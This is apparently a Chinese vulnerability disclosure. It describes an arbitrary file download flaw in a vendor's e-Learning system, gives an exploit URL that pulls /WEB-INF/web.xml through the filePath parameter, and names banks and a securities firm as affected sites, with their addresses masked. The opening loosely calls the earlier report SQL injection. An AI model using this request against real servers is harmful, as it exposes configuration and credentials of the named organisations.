翻看了前人漏洞http://**.**.**.**/bugs/wooyun-2014-065195某公司开发的e-Learning系统存在通用SQL注入漏洞。涉及的比较广:银行、邮政、证券、学校、企业、事业单位等。
开发公司:上海时代光华教育发展有限公司(http://**.**.**.**)
程序名称:e-Learning 线上学习
漏洞类型:任意文件下载
漏洞文件:fileServer/fileUpload/downloadFile.jsp
借用前人案例 自己也补充了一下。。
等等。。
漏洞证明:
如:包商银行网络商学院
http://**.**.**.**/eln3_asp/
下载/WEB-INF/web.xml文件。。
http://**.**.**.**/fileServer/fileUpload/downloadFile.jsp?filePath=/WEB-INF/web.xml
再如:
中国建设银行宁波市分行网络学院
http://**.**.**.**/eln3_asp/
苏州银行网络学院
http://**.**.**.**/eln3_asp/
吉林银行
http://**.**.**.**/eln3_asp/index.do
广发证券
http://**.**.**.**/eln3_asp/index.do
等等。。